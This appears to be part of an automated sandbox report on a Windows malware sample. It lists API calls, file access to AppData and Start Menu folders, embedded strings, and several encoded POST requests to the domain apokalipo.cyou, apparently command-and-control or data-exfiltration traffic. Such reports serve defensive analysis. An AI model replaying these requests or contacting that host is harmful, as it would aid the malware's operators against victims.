Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666644A8 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,SetErrorMode,2_2_666644A8
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666663E4 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666663E4
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666683E8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666683E8
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666623A0 FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_666623A0
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66665EE8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66665EE8
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66663F10 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,2_2_66663F10
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66667F84 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667F84
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66662C0C FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_66662C0C
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66666DDC __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66666DDC
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_66667B1C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667B1C
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_6666885C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_6666885C
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666668D8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666668D8
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: 2_2_666649E4 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,2_2_666649E4
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 4x nop then push ebx 1_2_6E244630
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: five POST requests to the same URL. Request line and the headers common to all five (in the order sent; the per-request headers listed afterwards sit between User-Agent and Host):
    POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Host: apokalipo.cyou
  Request 1: Content-Length: 96
  Request 2: title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg; Content-Length: 53
  Request 3: title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg; Content-Length: 208
  Request 4: Content-Length: 96
  Request 5: title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg; Content-Length: 53
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: apokalipo.cyou
Source: unknown | HTTP traffic detected: the same POST as request 1 above (Content-Length: 96, no title header)
                  Source: KClGcCpDAP.exe | String found in binary or memory: http://appsyndication.org/2006/appsyn
                  Source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202727575.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2211577219.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219967891.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0L
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.thawte.com0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://relaxng.org/ns/structure/1.0
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://relaxng.org/ns/structure/1.0allocating
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
                  Source: KClGcCpDAP.exe, 00000000.00000003.1728770025.000000000135B000.00000004.00000020.00020000.00000000.sdmp, KClGcCpDAP.exe, 00000000.00000002.1729145495.000000000135E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcd.com0&
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://virtualbox.org/firmware/VBoxEFI32.fd
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVB
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://virtualbox.org/firmware/VBoxEFI64.fd
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://virtualbox.org/firmware/VBoxEFIDual.fd
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.???.xx/?search=%s
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003CFD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003B5A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221794602.00000000025B5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.info-zip.org/
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.innotek.de/VirtualBox-settings
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html....................D:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.com
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.de
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977816040.0000000140156000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.surfok.de/
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps0(
